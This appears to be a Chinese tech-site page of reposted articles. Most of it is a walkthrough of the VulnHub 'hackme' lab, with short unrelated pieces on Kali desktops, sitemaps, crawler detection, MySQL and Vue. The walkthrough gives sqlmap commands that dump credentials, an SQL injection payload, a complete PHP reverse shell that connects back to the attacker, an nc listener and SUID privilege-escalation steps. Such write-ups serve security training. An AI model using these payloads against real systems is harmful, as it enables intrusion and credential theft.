前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[判断Shell变量是否存在方法]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently. This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.149 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和Kali后进行扫描 方法一、arp-scan -I eth0 -l (指定网卡扫) arp-scan -I eth0 -l 方法二、masscan 扫描的网段 -p 扫描端口号 masscan 192.168.184.0/24 -p 80,22 方法三、netdiscover -i 网卡-r 网段 netdiscover -i eth0 -r 192.168.184.0/24 方法四、等你们补充 2.1.2 查看靶机开放的端口 使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口 可以发现有 2 个端口开放,22 和 80 2.1.3 尝试访问靶机网页 2.2枚举漏洞 22 端口分析 一般只能暴力破解,暂时没有合适的字典 80 端口分析 访问网站, 发现是一个登陆页面 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nm2jCq05-1650016495541)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110170424128.png)] 成功登录后 尝试手工注入:x' or 1=1 成功返回所有信息,说明存在SQL注入 2.3漏洞利用 2.3.1 sqlmap 利用注入漏洞 使用 burp 抓查询数据包 POST /welcome.php HTTP/1.1Host: 192.168.184.149Content-Length: 23Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.184.149Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.184.149/welcome.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3Connection: closesearch=x 将数据包保存为文件 hackme1.txt 使用 sqlmap 跑一下测试漏洞并获取数据库名: 🚀 python sqlmap.py -r hackme1.txt --dbs --batch [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DjhXfuV9-1650016495544)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110171527015.png)] 数据库除了基础数据库有webapphacking 接下来咱们获取一下表名 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mzxiwhu-1650016495544)(C:\Users\zhang\AppData\Roaming\Typora\typora-user-images\image-20220110172336353.png)] 可以得到两个表books和users 咱们先获取一下users表的信息 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking -T users --dump --batch 可以看到有一个superadmin,超级管理员,看起来像一个md5 扩展 在线解密md5网站 国内MD5解密: http://t007.cn/ https://cmd5.la/ https://cmd5.com/ https://pmd5.com/ http://ttmd5.com/ https://md5.navisec.it/ http://md5.tellyou.top/ https://www.somd5.com/ http://www.chamd5.org/ 国外MD5解密: https://www.md5tr.com/ http://md5.my-addr.com/ https://md5.gromweb.com/ https://www.md5decrypt.org/ https://md5decrypt.net/en/ https://md5hashing.net/hash/md5/ https://hashes.com/en/decrypt/hash https://www.whatsmyip.org/hash-lookup/ https://www.md5online.org/md5-decrypt.html https://md5-passwort.de/md5-passwort-suchen 解出来密码是:Uncrackable 登录上去,发现有上传功能 2.3.2 文件上传漏洞 getshell 将 kali 自带的 php-reverse-shell.php 复制一份到 查看文件内容,并修改IP地址 <?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听:nc -lvp 6666 访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了,换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询:touchmenot 没找到 尝试运行程序:发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这? 总结 本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具:sqlmap 抓包工具:burpsuite Webshell 后门:kali 内置后门 Suid 提权:touchmenot 提权 本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-02 12:50:54
497
转载
转载文章
...担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 kali 32位默认是gnome桌面,我感觉又难看又卡。下面是换xfce4的方法: 1.安装xfce4: apt install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies 2.试试切换: update-alternatives --config x-session-manager 这一步会让你输入序号选择桌面,选startxfce就好。 重启后看看效果,如果还是gnome桌面的话: 3.卸载gnome: apt remove gnome-coreapt remove gnome-shell 4.重启 接下来如果想DIY程序菜单,就安装: apt-get install alacarte 这样在附件里会出现“主菜单”按钮,点这个就可以设置菜单栏。 转载于:https://www.cnblogs.com/cnnnnnn/p/10122070.html 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_30566063/article/details/97975652。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-04 22:18:47
80
转载
Shell
...本文中提到的语境下,Shell在DevOps自动化流程中的重要作用体现在通过编写shell脚本实现自动化构建、测试和发布等环节,极大地提升了软件交付的速度和质量。 CI/CD(Continuous Integration/Continuous Deployment) , CI/CD是现代软件开发流程中的重要概念,其中CI(持续集成)指的是开发过程中频繁地将代码变更合并到主分支,并进行自动化的构建和测试以尽早发现并解决问题;CD(持续部署或持续交付)则是在CI的基础上,一旦代码通过自动化测试,则自动部署到生产环境或预生产环境中。文中提及随着CI/CD的普及,shell脚本在这一流程中的优化变得至关重要。 Bash shell , Bash(Bourne-Again SHell)是一种广泛使用的Unix/Linux shell,它是GNU计划的一部分,基于Bourne shell发展而来,提供了更加强大且丰富的功能。作为命令行解释器,用户可以通过bash shell输入并执行各种命令和脚本来操作计算机系统,包括文件管理、程序运行、环境变量设置、脚本编程等任务。在本文推荐的学习资源中,《Learn the bash shell》是一本专门针对bash shell的入门书籍。
2023-08-08 22:29:15
82
冬日暖阳_t
JQuery插件下载
...rtjax的ajax方法(Smartjax.ajax())发起请求时,如果后续的请求与之前相同(基于URL),它会识别并利用浏览器的缓存机制,避免重复向服务器发送请求,从而显著提升页面加载速度和用户体验。这个插件的核心特性在于其对缓存策略的自动管理,无需开发者手动设置cache选项。它能够自动判断是否有必要更新数据,只有在数据已过期或有新的变动时,才会从服务器获取最新内容。这不仅减轻了服务器负担,也减少了网络延迟,使得网页在用户频繁交互时仍能保持快速响应。Smartjax的易用性体现在其无缝集成到jQuery的ajax流程中,只需简单调用插件提供的方法,即可享受到高效的数据缓存带来的好处。这对于经常需要更新数据但希望提供快速加载体验的Web应用来说,是一个理想的解决方案。总之,Smartjax是一款实用且高效的前端工具,能显著提升现代网站的性能和用户交互效率。 点我下载 文件大小:40.96 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-06-16 20:53:38
41
本站
HTML
...是不应该的)。 解决方法: 不要实时动态生成!不要实时动态生成!每次查一下数据库,再生成数据,再响应,这个过程不快! 如果非要动态生成,建议设置一个调度,每隔几个小时,生成一下然后存放静态的sitemap.xml文件放在服务器根路径下面,即https://www.你的域名.com/sitemap.xml这里。 这样,搜索引擎来抓取的时候,直接拿现成的静态文件,结合尝试三、尝试四,保证单个sitemap文件又不会太大,就很稳妥了。响应速度又快,单文件大小又舒服,url数量又符合搜索引擎的预期。 写在后面的话 对于sitemap.xml的应用,新站还需要注意下面几个地方: 名字无所谓,但一定都是xxx.xml格式,xxx的名字最终你会提交给站长后台的,但要小写,不要出现一些乱七八糟的符号 新站不要过分依赖于sitemap.xml,搜索引擎对于新站的态度其实更喜欢自己发现的url,sitemap.xml提交几千几万也不见得会都来爬取 爬取是第一步,是否收录,还取决于站点的质量等等因素,这个比较博大精深了,我也说不好其中一二 以及,lastmod这个也不要任意改,比如你只改了lastmod但没改文章内容,会存在概率性被搜索引擎认为是作弊的 被索引的文章,不要删除,否则搜索引擎会认为站点不稳定 最后,sitemap.xml提交只是第一步,更多的还是应该注重站点的质量建设、外链维护、用户体验的提升
2024-01-26 18:24:34
497
admin-tim
Java
...条件,比如网站质量、是否原创、是否重复、用户体验、外链建设等等,不在这里展开介绍了。 2. 举个例子 比如Google的爬虫,每次来访的时候,都会带着它独有的user-agent,如下: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 从这个user-agent可以看到出,来访者会告知自己身份是Googlebot,即来自谷歌搜索引擎的爬虫。 关于爬虫身份的识别,zac老师整理过一篇非常权威的列表,大家可参考: https://www.seozac.com/course/spider-user-agent-list/ 3.java代码示例 3.1 身份标识枚举类 识别了爬虫身份后,这里封装了一个身份枚举类,作为简单说明和java方法返回值。每个枚举项目后面的注释里都标注着对应爬虫的关键词,可以用来做字符串contains操作。 public static enum UserAgentRole { BAIDU_SPIDER, // Baiduspider/2.0或Baiduspider-render/2.0 GOOGLE_SPIDER, // Googlebot/2.1或Googlebot-Image/1.0 BING_SPIDER, //bingbot/2.0 SOUGOU_SPIDER, // Sogou web spider/4.0或Sogou wap spider/4.0 _360_SPIDER, // 360Spider SHENMA_SPIDER, // YisouSpider/5.0 YANDEX_SPIDER, // YandexBot/3.0 HUAWEI_SPIDER, // PetalBot AMAZON_SPIDER, // Amazonbot/0.1 OTHER_SPIDER, // 未知spider NATURAL_USER, // 非spider的自然用户 UNKNOWN // 没有user-agent头 } 3.2 HttpServletRequest中取得User-Agent HttpServletRequest request = ... String userAgent = request.getHeader("User-Agent"); 3.3 通过userAgent返回UserAgentRole private static UserAgentRole checkUserAgentRole(String userAgent) { if (StringUtils.isEmpty(userAgent)) { return UserAgentRole.UNKNOWN; } userAgent = userAgent.toLowerCase(); if (userAgent.contains("bot") || userAgent.contains("spider")) { if (userAgent.contains("baidu")) { return UserAgentRole.BAIDU_SPIDER; } else if (userAgent.contains("google")) { return UserAgentRole.GOOGLE_SPIDER; } else if (userAgent.contains("bing")) { return UserAgentRole.BING_SPIDER; } else if (userAgent.contains("sougou")) { return UserAgentRole.SOUGOU_SPIDER; } else if (userAgent.contains("360")) { return UserAgentRole._360_SPIDER; } else if (userAgent.contains("yisou")) { return UserAgentRole.SHENMA_SPIDER; } else if (userAgent.contains("yandex")) { return UserAgentRole.YANDEX_SPIDER; } else if (userAgent.contains("petal")) { return UserAgentRole.HUAWEI_SPIDER; } else if (userAgent.contains("amazon")) { return UserAgentRole.AMAZON_SPIDER; } else { return UserAgentRole.OTHER_SPIDER; } } return UserAgentRole.NATURAL_USER; } 4. 不带User-Agent的搜索引擎的爬虫 多说一句,有时候即使是正经搜索引擎的爬虫,也不会带着User-Agent来正经标识自己的爬虫身份。 这是因为,为了在seo里为了避免下面这种情况: 某站长作弊,对普通用户返回一套页面,对搜索引擎,返回一套页面。 对搜索引擎返回的页面是做过特殊优化的,其实是有作弊嫌疑的。 那搜索引擎为了判断是否有作弊嫌疑,就会用正经带有爬虫标识的User-Agent请求一次,再在不定期的时候用普通身份请求一次。
2024-01-26 16:45:09
426
admin-tim
Python
...元素索引以及执行条件判断更为简洁高效。此外,对于大数据处理或科学计算场景,NumPy库提供的ndarray对象在性能上远超Python原生列表,可以实现快速的矩阵运算和统计分析。 近期,一篇发布于“Real Python”网站的文章深入探讨了如何利用列表推导式(List Comprehensions)和生成器表达式(Generator Expressions)对列表进行复杂操作,如过滤、映射和压缩数据,从而提升代码可读性和运行效率。文章还介绍了functools模块中的reduce函数,用于对列表元素执行累积操作,如求乘积、求序列中最长连续子序列等。 另外,在实际编程实践中,掌握列表的排序、切片、连接、复制等基本操作同样至关重要。例如,使用sorted()函数或列表的sort()方法对列表进行排序;利用切片技术实现列表的部分提取或替换;通过extend()和+运算符完成列表合并等。这些操作不仅能丰富你对Python列表的理解,更能在日常开发任务中助你事半功倍。 总的来说,深入学习和熟练运用Python列表的各种特性与功能,不仅有助于数据分析和处理,更能提升代码编写质量,使程序更加简洁、高效。同时,关注Python社区的最新动态和最佳实践,将能持续拓展你的编程技能边界,紧跟时代发展步伐。
2023-10-05 18:16:18
359
算法侠
Python
...一下我们的代码,看看是否有任何明显的错误。让我们先来看看这段射...
2023-12-10 11:15:11
201
昨夜星辰昨夜风_t
转载文章
...于文本间隔创新实践的方法和技术趋势。文章不仅详述了使用特殊字符作为间隔符号的传统方式,还进一步引荐了一种利用CSS Grid、Flexbox等现代布局技术进行创意文本间隔的设计思路,例如通过grid-gap属性实现自定义形状或大小的间隔元素。 同时,随着无障碍设计的日益重视,文章也提醒设计师们在追求视觉效果的同时,应确保文本间隔方案对屏幕阅读器等辅助设备友好,避免影响信息可读性和用户体验。文中引用了WCAG 2.1指南的相关建议,指导如何在满足美观需求的同时,兼顾无障碍性要求。 此外,针对移动端适配和响应式设计的需求,文章提供了一系列实战案例,如使用CSS变量、媒体查询等工具动态调整文本间隔以适应不同屏幕尺寸,展示了在实际项目中如何灵活运用这些技术和策略。 综上所述,无论是从设计美学、技术实现还是无障碍性角度,文本间隔设计都值得设计师们深入研究和探索,不断优化网页内容的呈现形式,为用户提供更为优质的阅读体验。
2023-09-06 23:57:46
113
转载
MySQL
...了一个问题,反馈你不存在数据库表,可能是由于以下缘由: 问题信息:Table 'database_name.table_name' doesn't exist. 问题缘由可能是: 1. 表空间名称输入问题。请核实您输入的表空间名称是否准确。 比方说,输入“my_database”而不是“myDataBase”。 2. 数据表名问题。请核实您输入的数据表名是否准确。 比方说,输入“user”而不是“users”。 3. 您没有许可查阅该数据库表。请核实您是否有查阅该表所需的许可。 4. 数据库表已被删除。请核实您输入的表名是否准确,或者您的表是否已被删除。 5. 数据库连接故障。请核实您的MySQL连接是否正常工作。 比方说,您的MySQL服务器是否正常工作,或者您是否使用了准确的用户名和密码。 解决方法: 1. 确认表空间名称和表名称是否准确。 2. 确认您是否具有查阅该数据库表的许可。 3. 如果表已经被删除,请尝试恢复表或使用备份复制该表。 4. 确认MySQL连接是否正常。 如果您还是无法解决问题,请联系MySQL管理员或开发人员进行支持。
2023-11-28 12:42:54
55
算法侠
AngularJS
...t 指令会调用关联的方法或表达式进行预定义的操作,如数据验证、异步请求等,从而实现对表单提交行为的自定义控制。 布尔类型 , 布尔类型是编程语言中的基本数据类型之一,在本文语境中特指 AngularJS 表达式返回的结果应符合的数据类型要求。布尔类型只有两个值,即 true 和 false。在 ngsubmit 表达式中,返回值必须为布尔型,以便 AngularJS 根据该结果判断是否执行表单提交操作。如果表达式的返回值不是布尔类型,那么 AngularJS 就无法正确判断表单提交的状态,进而可能导致异常。
2023-11-13 22:15:25
463
寂静森林-t
转载文章
...担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 在打开虚拟机时报以下错误 解决方法 1.先检查内存完整性是否关闭。 2.禁用HV主机服务 3.以管理员身份打开 Powershell 输入 bcdedit /set hypervisorlaunchtype off 4.重启电脑 本篇文章为转载内容。原文链接:https://blog.csdn.net/m0_64259792/article/details/124397677。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-02-22 23:03:19
177
转载
转载文章
...性设置,用于定义元素是否可以成为鼠标事件(如点击、悬停)的目标。当将其值设为\ none\ 时,元素将不会响应任何鼠标交互,也不会捕获到焦点。在本文的上下文中,将input元素的pointer-events属性设置为none可以阻止用户通过键盘或鼠标使该输入框获取焦点,并且光标也不会在其上显示。 解释 , 在JavaScript事件处理编程中,\ preventDefault()\ 是一个方法,用于阻止事件默认行为的发生。例如,在mousedown、keydown等事件中调用此方法,可以阻止浏览器对事件的默认处理,如点击后跳转、表单提交等。在本文情境下,通过对input元素mousedown事件添加监听器并执行preventDefault(),能够阻止input因为鼠标点击而获取焦点。 解释 , \ tabindex\ 是HTML全局属性,它用于指定一个元素在页面中接收焦点的顺序,特别是通过键盘Tab键进行导航时。其取值可以是整数,负数或0。如果设置为\ -1\ ,则表示该元素不能通过键盘Tab键获得焦点,但仍可以通过JavaScript进行焦点控制。在本文中,提出使用\ tabindex=\ -1\ 的方式来防止input元素被键盘焦点序列选中,从而达到禁用键盘对input元素操作的效果。
2023-09-25 11:55:54
62
转载
VUE
...确设定了你的系统环境变量。 npm install -g vue-cli 一旦Vue CLI设置完成,我们就可以运用它来新建一个新的Vue项目。在你需要运行exe的地方新建一个新的工程目录。打开指令行并运行以下指令: vue create my-app 这个指令将新建一个新的Vue项目,将其命名为“my-app”。 接下来,我们需要在项目中设置一个Node.js模块,用于操控本地文件系统。在你的工程目录中运行以下指令: npm install fs-extra --save fs-extra该模块包含许多有用的方式来操控本地文件系统。现在,我们已经预备完成开始编写程序了。 我们将新建一个按钮来运行exe文件。在你的Vue组件中添加以下模板代码: Run Exe 现在,我们要在我们的Vue组件中添加一个方式,用于运行exe文件。在组件中添加以下JavaScript代码: 这个方式运用了fs-extra模块来保证exe文件存在。如果不存在,它将新建一个新的空文件。一旦它存在,它就会运用node.js的子线程来运行exe文件。如果遇到问题,它将在控制台打印错误消息。 现在,你已经有了一个简单的Vue按钮,可以在你的本地计算机上运行一个exe文件。你可以将其融入你的项目中,并用于任何需要运行exe文件的场景中。
2023-06-30 09:47:16
56
逻辑鬼才
Python
...hon正数筛选与累加方法,并结合abs()函数确保结果正确性,成功实现了对复杂数据集的有效分析。 此外,在金融风控领域,Python同样扮演着关键角色。在评估投资组合收益时,分析师需要精确计算正收益部分的累积和,以排除亏损交易的影响。运用文中介绍的条件判断循环结构,结合Python强大的pandas库进行数据清洗和计算,使得复杂的财务数据分析变得更为高效且精准。 更进一步,Python内置函数的强大性和灵活性,不仅体现在abs()这样的数学运算上,还表现在众多其他场景中。例如,Python 3.9版本引入了新特性——":= walrus operator",它可以简化if条件语句内部的赋值操作,使代码更加简洁易读。这一更新对于解决类似本文所述问题的程序编写具有重要意义,让开发者能够更好地应对实际编程挑战,提升代码质量及执行效率。 综上所述,无论是基础的正数求和问题,还是前沿的数据科学、金融分析等领域,Python以其丰富全面的功能和不断优化的语法设计,持续赋能广大开发者实现高效、准确的数据处理与业务逻辑构建。
2023-04-28 23:59:16
1590
软件工程师
MySQL
...要深入了解新版本功能是否能够提升应用效能或满足新的业务需求。 同时,MySQL的社区版与企业版之间也存在功能差异。企业用户在选择版本时需结合自身业务规模和技术支持需求来决定。例如,Oracle MySQL企业版提供了高级的集群解决方案、热备份工具及额外的监控选项,这些都是社区版不具备的功能。 此外,MySQL的替代品如PostgreSQL、MariaDB等数据库管理系统也在不断迭代发展,它们在特定场景下可能具备更优的性能或特性。因此,作为开发人员或IT管理员,在决定是否跟随MySQL最新版本更新,或者转向其他数据库系统时,应全面权衡技术选型、成本效益、团队技能储备等因素,并进行详尽的测试和评估。 总之,MySQL版本管理是持续的运维工作之一,理解不同版本的特点与变化趋势,结合实际应用场景制定合理的升级策略,将有助于提高系统的稳定性和应用的竞争力。
2023-10-03 21:22:15
106
软件工程师
转载文章
